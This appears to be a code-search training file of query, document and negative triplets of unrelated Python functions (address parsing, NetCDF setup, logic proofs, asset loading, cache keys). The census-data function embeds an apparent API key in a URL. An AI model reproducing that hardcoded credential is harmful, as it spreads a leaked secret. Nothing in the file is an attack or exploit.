"def NATL60state(n_ens=1):\n\n # Initial SSH field file name\n file_name_init_SSH_field='NATL60OSMO-CJM165_y2012m06d14-y2013m10d01.1d_SSHdegrad.nc'\n # Initial SSH field path\n path_init_SSH_field='/Users/sammymetref/Documents/Boost-Swot/Notebooks/GitHub/Personal_Files/2018/Data/OSMOSIS/'+file_name_init_SSH_field\n\n\n if n_ens>1:\n print('Warning: NATL60state only works for one-member-ensemble') \n fid = nc.Dataset(path_init_SSH_field)\n lon=np.array(fid.variables[\"nav_lon\"][:])\n lat=np.array(fid.variables[\"nav_lat\"][:]) \n multiplefields=np.array(fid.variables[\"degraded_sossheig\"][:,:]) \n \n state_vectors0_names='TMP_DA/state_vectors0.nc'\n ncout = nc.Dataset(state_vectors0_names, 'w', format='NETCDF3_CLASSIC')\n ncout.createDimension('x', lon.shape[0])\n ncout.createDimension('y', lat.shape[1])\n ncout.createDimension('member', n_ens)\n ncens = ncout.createVariable('ens', 'd', ('member',)) \n nclon = ncout.createVariable('nav_lon', 'f', ('x','y',))\n nclat = ncout.createVariable('nav_lat', 'f', ('x','y',)) \n nclat[:,:] = lat \n nclon[:,:] = lon \n nchei = ncout.createVariable('degraded_sossheig', 'f', ('member','x','y',))\n ncens[:] = range(n_ens) \n for i_ens in range(n_ens): \n nchei[i_ens,:,:] = multiplefields[0,:,:] \n ncout.close()\n \n \n return state_vectors0_names",
"def _prove_NNE() -> Proof:\n # Optional Task 6.7b\n lines = [None] * 8\n lines[0] = Proof.Line(Formula.parse(\"~~p\"))\n lines[1] = Proof.Line(Formula.parse(\"(~~p->(~~~~p->~~p))\"), I1, [])\n lines[2] = Proof.Line(Formula.parse(\"(~~~~p->~~p)\"), MP, [0, 1])\n lines[3] = Proof.Line(Formula.parse(\"((~~~~p->~~p)->(~p->~~~p))\"), N, [])\n lines[4] = Proof.Line(Formula.parse(\"(~p->~~~p)\"), MP, [2, 3])\n lines[5] = Proof.Line(Formula.parse(\"((~p->~~~p)->(~~p->p))\"), N, [])\n lines[6] = Proof.Line(Formula.parse(\"(~~p->p)\"), MP, [4, 5])\n lines[7] = Proof.Line(Formula.parse(\"p\"), MP, [0, 6])\n\n p = Proof(InferenceRule([Formula.parse('~~p')], Formula.parse('p')),\n {MP, I0, I1, D, N}, lines)\n return remove_assumption(p)",
"def read_coordinates_nis():\n\n initN_df=pd.read_csv(os.path.join(data_path, 'interim/demographic/initN_arrond.csv'))\n NIS = initN_df.NIS.values\n\n return NIS",
"def _parser_postprocessing(data):\n # if valid postcode information found then split between in and outcode\n if data['Postcode'].count() > 0:\n postcodes = data['Postcode'].str.split(' ', expand=True)\n postcodes.rename(columns={0: 'postcode_in', 1: 'postcode_out'}, inplace=True)\n data = pd.concat([data, postcodes], axis=1)\n else:\n data['postcode_in'] = None\n data['postcode_out'] = None\n\n # data containers for those components not parsed, but derived during post-processing\n data['PAOstartNumber'] = None\n data['PAOendNumber'] = None\n data['PAOstartSuffix'] = None\n data['PAOendSuffix'] = None\n data['SAOStartNumber'] = None\n data['SAOEndNumber'] = None\n data['SAOStartSuffix'] = None\n data['SAOEndSuffix'] = None\n\n # if building number is present, then copy it to start number\n data['PAOstartNumber'] = data['BuildingNumber'].copy()\n\n # in some other cases / is in the BuildingName field - now this separates the building and flat\n # the first part refers to the building number and the second to the flat\n tmp = r'(\\d+)\\/(\\d+)'\n msk = data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['PAOstartNumber'].isnull(), 'PAOstartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[1]\n\n # some cases the SAO components end up in the organisation name field, need to be separated\n tmp = r'(\\d+)([A-Z])-(\\d+)([A-Z])'\n msk = data['OrganisationName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'OrganisationName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOStartSuffix'].isnull(), 'SAOStartSuffix'] = extracted_components[1]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[2]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[3]\n\n # some cases the SAO components end up in the organisation name field, need to be separated\n tmp = r'(\\d+)-(\\d+)([A-Z])'\n msk = data['OrganisationName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'OrganisationName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[1]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[2]\n\n # sometimes both PAO and SAO range is in the BuildingName e.g. \"35A-35D 35A-35F\"\n tmp = r'(\\d+)([A-Z])-(\\d+)([A-Z]).*?(\\d+)([A-Z])-(\\d+)([A-Z])'\n msk = data['BuildingNumber'].isnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOStartSuffix'].isnull(), 'SAOStartSuffix'] = extracted_components[1]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[2]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[3]\n data.loc[msk & data['PAOstartNumber'].isnull(), 'PAOstartNumber'] = extracted_components[4]\n data.loc[msk & data['PAOstartSuffix'].isnull(), 'PAOstartSuffix'] = extracted_components[5]\n data.loc[msk & data['PAOendNumber'].isnull(), 'PAOendNumber'] = extracted_components[6]\n data.loc[msk & data['PAOendSuffix'].isnull(), 'PAOendSuffix'] = extracted_components[7]\n\n # sometimes both PAO and SAO range is in the BuildingName e.g. \"28A-28F PICCADILLY COURT 457-463\"\n tmp = r'(\\d+)([A-Z])-(\\d+)([A-Z]).*?(\\d+)-(\\d+)'\n msk = data['BuildingNumber'].isnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOStartSuffix'].isnull(), 'SAOStartSuffix'] = extracted_components[1]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[2]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[3]\n data.loc[msk & data['PAOstartNumber'].isnull(), 'PAOstartNumber'] = extracted_components[4]\n data.loc[msk & data['PAOendNumber'].isnull(), 'PAOendNumber'] = extracted_components[5]\n\n # sometimes both PAO and SAO range is in the BuildingName e.g. \"3-3A CHURCHILL COURT 112-144\"\n tmp = r'(\\d+)-(\\d+)([A-Z]).*?(\\d+)-(\\d+)'\n msk = data['BuildingNumber'].isnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[1]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[2]\n data.loc[msk & data['PAOstartNumber'].isnull(), 'PAOstartNumber'] = extracted_components[3]\n data.loc[msk & data['PAOendNumber'].isnull(), 'PAOendNumber'] = extracted_components[4]\n\n # sometimes both building number and flat range are stored in BuildingName (e.g. 9B-9C 65A), separate these\n tmp = r'(\\d+)([A-Z])-(\\d+)([A-Z])\\s.*?(\\d+)([A-Z])'\n msk = data['BuildingNumber'].isnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOStartSuffix'].isnull(), 'SAOStartSuffix'] = extracted_components[1]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[2]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[3]\n data.loc[msk & data['PAOstartNumber'].isnull(), 'PAOstartNumber'] = extracted_components[4]\n data.loc[msk & data['PAOstartSuffix'].isnull(), 'PAOstartSuffix'] = extracted_components[5]\n\n # if building number is not present, try to extract from building name if appropriate type\n # deal with cases where buildingName contains a suffix range: 24D-24E\n tmp = r'(\\d+)([A-Z])-(\\d+)([A-Z])'\n msk = data['PAOstartNumber'].isnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['PAOstartNumber'].isnull(), 'PAOstartNumber'] = extracted_components[0]\n data.loc[msk & data['PAOstartSuffix'].isnull(), 'PAOstartSuffix'] = extracted_components[1]\n data.loc[msk & data['PAOendNumber'].isnull(), 'PAOendNumber'] = extracted_components[2]\n data.loc[msk & data['PAOendSuffix'].isnull(), 'PAOendSuffix'] = extracted_components[3]\n # deal with cases where buildingName contains a suffix range: 24-24E\n tmp = r'(\\d+)-(\\d+)([A-Z])'\n msk = data['PAOstartNumber'].isnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['PAOstartNumber'].isnull(), 'PAOstartNumber'] = extracted_components[0]\n data.loc[msk & data['PAOendNumber'].isnull(), 'PAOendNumber'] = extracted_components[1]\n data.loc[msk & data['PAOendSuffix'].isnull(), 'PAOendSuffix'] = extracted_components[2]\n # deal with cases where buildingName is a range: 120-122\n tmp = r'(\\d+)-(\\d+)'\n msk = data['PAOstartNumber'].isnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['PAOstartNumber'].isnull(), 'PAOstartNumber'] = extracted_components[0]\n data.loc[msk & data['PAOendNumber'].isnull(), 'PAOendNumber'] = extracted_components[1]\n # deal with cases where buildingName is 54A or 65B but not part of a range e.g. 65A-65B\n tmp = r'(?<!-|\\d)(\\d+)([A-Z])(?!-)'\n msk = data['PAOstartNumber'].isnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['PAOstartNumber'].isnull(), 'PAOstartNumber'] = extracted_components[0]\n data.loc[msk & data['PAOstartSuffix'].isnull(), 'PAOstartSuffix'] = extracted_components[1]\n\n # if building start number is present, then add to SAO\n # sometimes subBuildingName contains the flat range e.g. 14E-14E extract the components\n tmp = r'(\\d+)([A-Z])-(\\d+)([A-Z])'\n msk = data['SubBuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'SubBuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOStartSuffix'].isnull(), 'SAOStartSuffix'] = extracted_components[1]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[2]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[3]\n\n # sometimes subBuildingName contains the flat range e.g. 14-14E extract the components\n tmp = r'(\\d+)-(\\d+)([A-Z])'\n msk = data['SubBuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'SubBuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[1]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[2]\n\n # sometimes subBuildingName is e.g. C2 where to number refers to the flat number\n tmp = r'([A-Z])(\\d+)'\n msk = data['SubBuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'SubBuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[1]\n data.loc[msk & data['SAOStartSuffix'].isnull(), 'SAOStartSuffix'] = extracted_components[0]\n\n # deal with cases where buildingName contains a suffix range: 24D-24E\n tmp = r'(\\d+)([A-Z])-(\\d+)([A-Z])'\n msk = data['PAOstartNumber'].notnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOStartSuffix'].isnull(), 'SAOStartSuffix'] = extracted_components[1]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[2]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[3]\n\n # deal with cases where buildingName contains a suffix range: 24-24E\n tmp = r'(\\d+)-(\\d+)([A-Z])'\n msk = data['PAOstartNumber'].notnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[1]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[2]\n\n # some addresses have / as the separator for buildings and flats, when matching against NLP, needs \"FLAT\"\n msk = data['SubBuildingName'].str.contains('\\d+\\/\\d+', na=False, case=False)\n data.loc[msk, 'SubBuildingName'] = 'FLAT ' + data.loc[msk, 'SubBuildingName']\n\n # if SubBuildingName is empty, but BuildingName contains Block [A-Z], place this string to SubBuildingName\n tmp = r'(BLOCK [A-Z])'\n msk = data['SubBuildingName'].isnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n if len(extracted_components.index) > 0:\n data.loc[msk, 'SubBuildingName'] = extracted_components.values\n\n # deal with addresses that are of type 5/7 4 whatever road, the format assumed start/end_sao_numb pao_start_numb\n tmp = r'(\\d+)\\/(\\d+)'\n msk = data['SubBuildingName'].str.contains(tmp, na=False, case=False) & \\\n data['SAOStartNumber'].isnull() & data['BuildingNumber'].notnull()\n extracted_components = data.loc[msk, 'SubBuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SubBuildingName'] = extracted_components[0]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SubBuildingName'] = extracted_components[1]\n\n # if SubBuildingName contains only numbers, then place also to the sao start number field as likely to be flat\n msk = data['SubBuildingName'].str.isnumeric() & data['SAOStartNumber'].isnull()\n msk[msk.isnull()] = False\n data.loc[msk, 'SAOStartNumber'] = data.loc[msk, 'SubBuildingName']\n\n # if street name contains a number and buildingnumber is empty, then place it there and pao_start_number\n tmp = r'(\\d+)'\n msk = data['BuildingNumber'].isnull() & data['StreetName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'StreetName'].str.extract(tmp)\n if len(extracted_components.index) > 0:\n data.loc[msk, 'BuildingNumber'] = extracted_components.values\n data.loc[msk, 'PAOstartNumber'] = extracted_components.values\n\n # split flat or apartment number as separate for numerical comparison - compare e.g. SAO number\n # todo: rewrite\n msk = data['SubBuildingName'].str.contains('flat|apartment|unit', na=False, case=False)\n data.loc[msk, 'SAOStartNumber'] = data.loc[msk, 'SubBuildingName']\n data.loc[msk, 'SAOStartNumber'] = \\\n data.loc[msk].apply(lambda x: x['SAOStartNumber'].strip().\n replace('FLAT', '').replace('APARTMENT', '').replace('UNIT', ''),\n axis=1)\n\n return data",
"def go_get_data(postcodes,dataset,pathToData=''):\n results = []\n geoAreas = []\n for postcode in postcodes:\n pc = adjustpostcode(postcode)\n pathToData = ''\n conn = lite.connect(pathToData+'geo.db')\n geodb = conn.cursor() \n c_oa = geodb.execute(\"SELECT oa11, lat, long FROM geo WHERE pcd=?;\",(pc,));\n oa = None;\n for r in c_oa:\n results.append({'oa':str(r[0]),'lat':r[1],'lon':r[2],'postcode':postcode})\n geoAreas.append(str(r[0]))\n\n geoAreaslist = ','.join(geoAreas) \n #QS414EW\n #url = \"http://web.ons.gov.uk/ons/api/data/dataset/QS102EW.xml?context=Census&apikey=cHkIiioOQX&geog=2011STATH&diff=&totals=false&dm/2011STATH=%s\" % geoAreaslist\n url = \"http://web.ons.gov.uk/ons/api/data/dataset/%s.xml?context=Census&apikey=cHkIiioOQX&geog=2011STATH&diff=&totals=false&dm/2011STATH=%s\" % (dataset,geoAreaslist)\n response = urllib2.urlopen(url)\n xmlstring = response.read();\n xmlstring = re.sub('(xmlns:[^=]*)=\"[^\"]*\"', '\\\\1=\"_\"', xmlstring)\n root = ET.fromstring(xmlstring);\n \n data_results = {}\n for a in root.findall(\"{_}genericData/{_}DataSet/{_}Group/{_}Series\"):\n loc = a.find(\"{_}SeriesKey/{_}Value[@concept='Location']\")\n if loc is None: \n continue\n location_string = loc.attrib['value']\n if location_string not in data_results:\n data_results[location_string] = []\n for dp in a.findall(\"{_}Obs/{_}ObsValue\"):\n data_string = dp.attrib['value']\n data_results[location_string].append( float(data_string) )\n \n for res in results:\n for i,d in enumerate(data_results[res['oa']]):\n res[dataset+\"_%d\" % i] = d\n #res[dataset] = data_results[res['oa']]\n return results",
"def _calculate_voronoi(self):\n centroids = [node.location() for node in self]\n vor = Voronoi(centroids)\n self._voronoi = (centroids, vor, voronoi_finite_polygons(vor))",
"def nyt_cases_counties(df):\n # Cast date as datetime\n df['date'] = pd.to_datetime(df['date'])\n # Drop records with county = 'Unknown' or no FIPs code\n df = df.loc[(df['county'] != 'Unknown') & (df['fips'].notnull())].copy()\n # Store FIPS codes as standard 5 digit strings\n df['fips'] = _fips_cleaner(df['fips'])\n # Drop FIPs that are not part of US states, cast deaths to int\n df = df.loc[df['fips'].str.slice(0,2) <= '56'].copy()\n df['deaths'] = df['deaths'].astype(int)\n return df",
"def nodata(self):\n return self._nodata",
"def parse(self, data, normalised_field_name='ADDRESS_norm'):\n self.log.info('Start parsing address data...')\n\n data = self._normalize_input_data(data, normalised_field_name=normalised_field_name)\n\n addresses = data[normalised_field_name].values\n self.log.info('{} addresses to parse...'.format(len(addresses)))\n\n # temp data storage lists\n organisation = []\n department = []\n sub_building = []\n building_name = []\n building_number = []\n street = []\n locality = []\n town = []\n postcode = []\n\n # loop over addresses and use the probabilistic parser to tag the address components - should avoid a loop\n for address in tqdm(addresses):\n parsed = parser.tag(address.upper())\n possible_postcode = self._extract_postcode(address) # regular expression extraction\n\n # if both parsers found postcode then check that they are the same\n if parsed.get('Postcode', None) is not None and possible_postcode is not None:\n if parsed['Postcode'] != possible_postcode:\n # not the same, use possible_postcode\n parsed['Postcode'] = possible_postcode\n\n # if the probabilistic parser did not find postcode but regular expression did, then use that\n if parsed.get('Postcode', None) is None and possible_postcode is not None:\n parsed['Postcode'] = possible_postcode\n\n if parsed.get('Postcode', None) is not None:\n # check that there is space, if not then add if the parsed postcode is long enough to contain a complete\n # postcode. Some users have partial postcodes to which one should not add a space.\n if ' ' not in parsed['Postcode'] and len(parsed['Postcode']) > 4:\n in_code = parsed['Postcode'][-3:]\n out_code = parsed['Postcode'].replace(in_code, '')\n parsed['Postcode'] = out_code + ' ' + in_code\n\n # change to all capitals\n parsed['Postcode'] = parsed['Postcode'].upper()\n\n # if Hackney etc. in StreetName then remove and move to locality if town name contains London\n # Probabilistic parser should see more cases with london localities, parsed incorrectly at the mo\n if parsed.get('StreetName', None) is not None and parsed.get('TownName', None) is not None:\n if 'LONDON' in parsed['TownName']:\n parsed = self._fix_london_boroughs(parsed, os.path.join(self.currentDirectory, '../../data/'))\n\n # sometimes building number gets placed at building name, take it and add to building name\n if parsed.get('BuildingNumber', None) is None and parsed.get('BuildingName', None) is not None:\n tmp = parsed['BuildingName'].split(' ')\n if len(tmp) > 1:\n try:\n _ = int(tmp[0])\n parsed['BuildingNumber'] = tmp[0]\n except ValueError:\n pass\n\n # some addresses contain place CO place, where the CO is not part of the actual name - remove these\n # same is true for IN e.g. Road Marton IN Cleveland\n if parsed.get('Locality', None) is not None:\n if parsed['Locality'].strip().endswith(' CO'):\n parsed['Locality'] = parsed['Locality'].replace(' CO', '')\n if parsed['Locality'].strip().endswith(' IN'):\n parsed['Locality'] = parsed['Locality'].replace(' IN', '')\n\n # parser sometimes places house to organisation name, while it is likelier that it should be subBuilding\n if parsed.get('OrganisationName') == 'HOUSE' and parsed.get('SubBuildingName', None) is None:\n parsed['SubBuildingName'] = parsed.get('OrganisationName')\n\n # store the parsed information to separate lists\n organisation.append(parsed.get('OrganisationName', None))\n department.append(parsed.get('DepartmentName', None))\n sub_building.append(parsed.get('SubBuildingName', None))\n building_name.append(parsed.get('BuildingName', None))\n building_number.append(parsed.get('BuildingNumber', None))\n street.append(parsed.get('StreetName', None))\n locality.append(parsed.get('Locality', None))\n town.append(parsed.get('TownName', None))\n postcode.append(parsed.get('Postcode', None))\n\n # add the parsed information to the dataframe\n data['OrganisationName'] = organisation\n data['DepartmentName'] = department\n data['SubBuildingName'] = sub_building\n data['BuildingName'] = building_name\n data['BuildingNumber'] = building_number\n data['StreetName'] = street\n data['Locality'] = locality\n data['TownName'] = town\n data['Postcode'] = postcode\n data['PAOText'] = data['BuildingName'].copy()\n data['SAOText'] = data['SubBuildingName'].copy()\n\n data = self._parser_postprocessing(data)\n\n return data",
"def getPostCodeMapping():\n postcode_mapping = {\n \"110031v\" : \"110031\", #removed the extra v in the end\n \"2242\" : \"122001\", # manually scanned the OSM file for pincode for same place\n \"10089\" : \"110085\", #checked manually on internet\n \"1100002\" : \"110002\",\n \"1100049\" : \"110049\",\n \"2010\" : \"201010\",\n \"1100016\" : \"110016\"\n }\n return postcode_mapping"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Load the links from assets(nordpool_files.yml)
|
def _load_nordpool_links() -> List[str]:
data = yaml.safe_load(pkgutil.get_data(__name__, "assets/nordpool_files.yml"))
return data.get('files', [])
|
[
"def links():\n links_list = tasks.json_list(os.path.join(pathlib.Path(__file__).parent.absolute(),'static/links.json'))\n return render_template('links.html',title='collegeSmart - Helpful Links',links=links_list)",
"def load_links():\n # if .hn doesn't exist, return empty list\n if not os.path.isfile(HN_PATH):\n return []\n # otherwise, load it up\n hn_links = json.load(open(HN_PATH, 'r'))\n return hn_links",
"def _load_links(self) -> NoReturn:\n total = self.project_size[2]\n self._links = {\n self.object_name(shared_enum.ElementType.LINK, index): index\n for index in range(total)\n }",
"def resources():",
"def gen_links() -> ReleaseAssets:\n # also fairly brittle when moving to another repo\n bucket = f\"{bucket_root}/{args.tag}\"\n src_name = f\"{gitlab_repo}-release-{args.tag}-dist.tgz\"\n sif_name = f\"{gitlab_repo}-release-{args.tag}.sif\"\n return ReleaseAssets(\n [\n Link(\n name=src_name,\n url=f\"{bucket}/{src_name}\",\n filepath=f\"/{src_name}\",\n link_type=LinkType.package,\n ),\n Link(\n name=sif_name,\n url=f\"{bucket}/{sif_name}\",\n filepath=f\"/{sif_name}\",\n link_type=LinkType.image,\n ),\n ]\n )",
"def load_resources(section, names):\n for name in names:\n RESOURCES[section].append(\n json.load(\n open(os.path.join(PROJECT_ROOT,\n 'static',\n 'js',\n '{0}.json'.format(name)))))",
"def fetch_links(self, normalized_name):\n package_url = f\"{self.index_url}/{normalized_name}\"\n text = CACHE.get(\n path_or_url=package_url,\n as_text=True,\n force=not self.use_cached_index,\n )\n links = collect_urls(text)\n # TODO: keep sha256\n links = [l.partition(\"#sha256=\") for l in links]\n links = [url for url, _, _sha256 in links]\n return links",
"async def yaml_resources(self):\n await self.log.debug('yaml_resources', 'Started')\n resources = {}\n yamlfile = \"{}/ui-lovelace.yaml\".format(self.base_dir)\n if os.path.isfile(yamlfile):\n with open(yamlfile, encoding='utf-8',\n errors='ignore') as localfile:\n load = yaml.load(localfile, Loader)\n resources = load.get('resources', {})\n localfile.close()\n else:\n await self.log.error(\n 'yaml_resources', 'Lovelace config in yaml file not found')\n await self.log.debug('yaml_resources', resources)\n return resources",
"def load_directories(self):\n self.SRC_DIR = Path(__file__).parent / \"src\"\n self.ASSETS_DIR = self.SRC_DIR / \"assets\"\n self.IMAGES = self.ASSETS_DIR / \"images\" \n self.MAPS = self.ASSETS_DIR / \"maps\"\n self.SFX = self.ASSETS_DIR / \"sfx\"\n self.MUSIC = self.ASSETS_DIR / \"music\"",
"def loadArticles():\n #print \"loadArticles()\"\n topDir = \"/home/phil/proj/euroelection\"\n allFns = os.listdir(topDir)\n artFns = [fn\n for fn in allFns\n if fn.endswith(\".art\")]\n #print \"loadArticles() artFns=%r\" % (artFns,)\n for artFn in artFns:\n artPn = topDir+\"/\"+artFn\n #print \"loading articles in <%s>...\" % (artPn,)\n artFStr = butil.readFile(topDir+\"/\"+artFn)\n readArticles(artFStr)\n #//for",
"def _copy_resources(self):\n resources = {}\n for _, article in self.config.special_articles.iteritems():\n resources.update(article.full['local_references'])\n for article in self.config.articles_by_date:\n resources.update(article.full['local_references'])\n for source, dest in resources.iteritems():\n dest_file = os.path.join(self.config.output_dir, *dest)\n url = self.config.url + '/'.join(*dest)\n logger.info('Writing resource \\'%s\\'...' % url)\n self.fileproc.copy_file(source, dest_file)",
"def get_assets(self):\n for root, dir, files in os.walk(self.config.main.assetdir):\n for name in files:\n asset = os.path.join(root, name)\n self.assets.append(parse_asset(asset))",
"def getImageUrls(file_name):\n\n # if no file_name, return empty list\n if not file_name:\n return []\n\n file_path = os.path.join(PROJECT_ROOT, file_name)\n with open(file_path) as url_file:\n urls = url_file.readlines()\n\n # Close opend file\n url_file.close()\n urls = [line.strip() for line in urls]\n\n return urls",
"def load_urls(self,filename='defaultsne.csv'):\n\t\tname_file = os.path.join(self.pars.csv_dir,filename)\n\t\tnames = pd.read_csv(name_file).Name\n\t\tself.url_filename = filename\n\t\tself.urls = [self.pars.prefix+name.replace(' ','%20')+'.json' \\\n\t\t\tfor name in names]",
"def get_links():\n\n directory = \"../_posts\"\n\n for file in os.scandir(directory):\n filename = os.fsdecode(file)\n print(f\"The file's name with path is: {filename}\")\n if filename.endswith(\".html\"):\n write_teaser_image(filename)\n else:\n print(\"Not an HTML file!\")",
"def main():\n start = \"http://www.harkavagrant.com/archive.php\"\n pagelinks = getPageLinks(start)\n piclinks = getComicLinks(pagelinks)\n # one dir for harkavagrant-hosted images, and one dir for other ones\n checkdir(\"original\")\n checkdir(\"other\")\n retrieve(piclinks)",
"def _set_assets(self, root: str, theme: LayoutTheme):\r\n css_base = [root + 'goldenlayout-base.css',\r\n root + 'goldenlayout-elvis.css',\r\n root + 'panel-customizations.css']\r\n css_theme = {LayoutTheme.LIGHT: [root + 'goldenlayout-elvis-light.css',\r\n root + 'panel-customizations-light.css'],\r\n LayoutTheme.DARK: [root + 'goldenlayout-elvis-dark.css',\r\n root + 'panel-customizations-dark.css']}\r\n js_files = {'jquery': root + 'js\\jquery-1.11.1.min.js',\r\n 'goldenlayout': root + 'js\\goldenlayout.min.js'}\r\n css_files = css_base + css_theme[theme]\r\n pn.config.js_files = js_files\r\n pn.config.css_files = css_files",
"def images(name):\n\n return static_file(name, root='images/')",
"def link_files(self):\n\n for package in self.packages:\n package.link_files()\n\n for _file in self.files:\n if _file.create_link:\n _file.link()"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Computes the cache key for assemble status. ``task`` must be one of the ``AssembleTask`` values. The scope can be the identifier of any model, such as the organization or project that this task is performed under. ``checksum`` should be the SHA1 hash of the main file that is being assembled.
|
def _get_cache_key(task, scope, checksum):
return 'assemble-status:%s' % hashlib.sha1(b'%s|%s|%s' % (
str(scope).encode('ascii'),
checksum.encode('ascii'),
task,
)).hexdigest()
|
[
"def get_assemble_status(task, scope, checksum):\n cache_key = _get_cache_key(task, scope, checksum)\n rv = default_cache.get(cache_key)\n if rv is None:\n return None, None\n return tuple(rv)",
"def hash_task(self, _task):\n ht = hashlib.blake2b(digest_size=12)\n ht.update(_task.encode('utf-8'))\n hsh = ht.hexdigest()\n # # it's a set, so don't worry about adding a hash multiple times\n # self.task_hashes.add(hsh)\n\n return hsh",
"def set_assemble_status(task, scope, checksum, state, detail=None):\n cache_key = _get_cache_key(task, scope, checksum)\n default_cache.set(cache_key, (state, detail), 600)",
"def make_task_cache_dirname(task):\n return task.fingerprint",
"def get_cache_key(class_name, settings=()):\n return '#{0}:{1}'.format(class_name, hash(tuple(settings)))",
"def getTaskKey(self, task_id):\n return",
"def get_cache_key(self, request, view):\n ip_address = request.data.get('ip_address')\n return self.cache_format % {\n 'scope': self.scope,\n 'ident': ip_address or self.get_ident(request)\n }",
"def _get_cache_key(self, **kwargs):\n m = md5()\n for significant_kwarg in self.significant_kwargs:\n key, to_str = significant_kwarg\n m.update(to_str(kwargs[key]))\n\n if hasattr(self, 'cache_prefix'):\n cache_prefix = self.cache_prefix\n else:\n cache_prefix = '%s.%s' % (self.__module__, self.__name__)\n return '%s:%s' % (cache_prefix, m.hexdigest())",
